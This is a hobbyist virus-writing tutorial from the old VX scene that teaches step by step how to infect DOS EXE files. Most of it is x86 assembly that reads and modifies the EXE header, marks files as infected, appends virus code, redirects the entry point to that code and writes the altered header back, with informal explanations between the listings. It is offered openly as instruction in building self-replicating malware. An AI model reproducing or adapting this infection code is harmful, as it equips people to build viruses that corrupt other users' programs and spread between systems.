3 EXE files: what u gotta do to infect them
EXE files: what you gotta do to infect them!
Most virus groups have a tut on com already so we wont dwell anywhere in COM Viruses
if your reading this TuT you should know the following things to fully grasp it:
- DTA and its offsets ie:Dta+1ah= filename
- at least be able to write a parasitic com virus
- delta offset
if your able to write a parasitic com u should now learn EXE
well to start off with we arent going to show you the basic things like search routines
we will show how ever what differs in infecting EXEs
1. before you calculate the delta offset u need save the PSP
push ds ;save ds segment
push cs cs ;save all cs
pop es ds ;ES info
see in here DS = ES= PSP and now thats saed, we will use this in the restore control routine
2. after you calculate your delta offset in a COM virus youd have:
lea si,[bp+TriByte]
lea di,100h
mov cx,3
rep movsb
well in a EXE virus its this:
lea si,[BP+EXE_IP]
lea di,[BP+Saved_IP]
mov cx,4
rep movsw
now we gonna tell you why, see in the virus , when it ifnects the Original Values in the Exeheader (well go in depth on the header here soon)
are saved in offsets in your virus but they must be copied to a place where they can be saved and thats what this does,
the reason for rep movsw is that each offset is word in size, there are 4 offsets.
after this u can set your DTA as usual and code your search routine
ok now the part most Newcomers to the VX scene find hard. now once a file is found and opened what do you do?
there are many methods, but this tut will discuss the msot simple
ok now that the file is open
read 28 bytes from the file
mov ah,3fh
mov cx,1ch ;1ch = 28
lea dx,[bp+exeheader]
int 21h
now you have the header in a file. now you MUST do some header stuff so now we will discuss the dreaded (to newbies) Exeheader!
keep in mind all the offsets a word in length
OFFSET CONTENT
0h EXE indicator MZ or ZM (initials of EXE inventor)
2h PartPag - lenght of last not full page (page = 512 bytes)
4h program length in 512 pages
6h number of things in relocation table
8h header length in Paragraphs (paragraph = 16 bytes)
0Ah minimum memory left in Paragraphs
0Ch maxmimum memory left in Paragraphs
0Eh segment correction for stack ( u know what a stack is right?)
10h stack pointer value
12h Checksum
14h value of EXEs instruction pointer
16h segment correction For CS
18h offset of first thing in relocation table
1Ah number of internal overlays
ok with that down lets go on, now that the headr is read you need to check some shite.
cmp word ptr [bp+exeheader+12h],'ID' ;u can also use 10h
je close
cmp word ptr [bp+exeheader+18h],'@'
je close
cmp word ptr [bp+exeheader+1Ah],0 ;check see if OVL # = 0
jne close ;if not = 0 close file
ok let me explain dis shit.
the first part checks the word in the Checksum to see if it matches your infection marker (marker can be any 2 bytes)
if the file already ahs been infected we close
if not we check to see if it is a NE or PE file
if it is a NE or PE we close because were infecting DOS executables
and then it checks offset 1Ah in the header to see its over lay #, if zero
this means the file has no internal overlays and we can infect it if it does though we will go to close
(jne - jump if not equal thus if 1Ah isnt not equal to zero clsoe file)
ok next we gotta save the EXEHEADER
save_header:
mov ax,word ptr [bp+exeheader+10h] ;get SP in ax
mov word ptr [bp+exe_sp],ax ;save SP
mov ax,word ptr [bp+Exeheader+16h] ;get CS in ax
mov word ptr [bp+exe_cs],ax ;save CS
mov ax,word ptr [bp+exeheader+14h] ;get IP in ax
mov word ptr [bp+exe_ip],ax ;save IP
mov ax,word ptr [bp+exeheader+0eh] ;get SS in ax
mov word ptr [bp+exe_ss],ax ;save SS
ret ;return
ok explanation:
ok what were doing here is moving AX into each value of theEXEHEADER then once AX is equal to a value in the exeheader
ax is saved in a offset in our virus
we are saving the exe header components;
now comes to cool part. the infection procedure!
first off go to the end of the file ( u do know how rite :) )
then push ax dx to save the results
then there are 2 techniques here u can use
1.
u can set the new offsets of your virus this way
mov cx,10h
div cx
sub ax,word ptr [bp+exeheader+8h]
ok see here at first we divide the file size by 10h (16d)
to get the size of the file in paragraphs so we can subtract the header size(located at offset 8h in header) from the file
ok now for the new offsets
mov word ptr [bp+exeheader+14h],dx ;NEW IP
mov word ptr [bp+exeheader+16h],ax ;NEW CS
mov word ptr [bp+exeheader+0eh],ax ;NEW SS
mov word ptr [bp+exeheader+10h],0fffeh ;NEW SP
mov word ptr [bp+exeheader+12h],'AP' ;infection checker
explanation:
now that your at the end of the file dx and ax are at the file end
thus we set the IP to dx which is at the end of the file so now the EXE IP points to what ever code is at the file end, your virus code
same thing goes with the rest of this routine accept for the 0fffeh part, u must set the SP for a large number so
the stack dont over write your virus.
ok now technique 2 for calculating offsets will be discussed it differs slighlty
(if u use this technique do a push bx b4 u save the header)
ok after u are at the file end and AX and dx are pushed
you do this:
mov bx,word ptr [bp+exeheader+8h] ;BX = Headersize
mov cl,4 ;convert to bytes
shl bx,cl ;multiply by 16
sub ax,bx ;subtract header size from file size
sbb dx,0 ;subtract from carry
mov cx,16d ;cx = 16
div cx ;file size in para
explanation? u got it.
when we move BX into word ptr [bp+exheader+8h], BX will contain the header size in paragraphs
then we shift left (shl0 the bytes in CX 4 positions like multiplying by 16
then we subtract the file size from bx which gives us the file size without the header
we need , then subtract 0 if the carrier flag is set
then it gets the file size in para like usual then u just calulate yer offsets like i taught.
ok now that thats done
do a pop dx ax this will restore the file size we need this so we can calculate the new file size in the header
(put bx last (pop dx ax bx) if u used techniuqe 2 so u dont destroy f_handle)
calc_size:
add ax,endvirus-start
adc dx,0
mov cx,200h
div cx
cmp dx,0
je continue
inc ax
continue:
mov word ptr [bp+exeheader+4h],ax
mov word ptr [bp+exeheader+2h],dx
ok now ill explain
this adds our virus size to AX so we can calculate the new PArt Pag and PagCNT
then after our virus is added on it divides the file by 200h (512d) and gets the file size in pages
(one page = 512 bytes)
then if dx is 0 it calculates the new offset otherwise it adds one to ax for rounding purposes
ok with AX holding the new file size in pages and DX the number of pages, we set them as the new Part Pag and Prt CNT
now write your virus code to the file (u know how to do that right)
then go to the header and write back the new virulent exeheader like this:
mov ah,40h
mov cx,1Ch
lea dx,[bp+exeheader]
int 21h
then close the file and go search for more. simple huh?
Virus-X, peace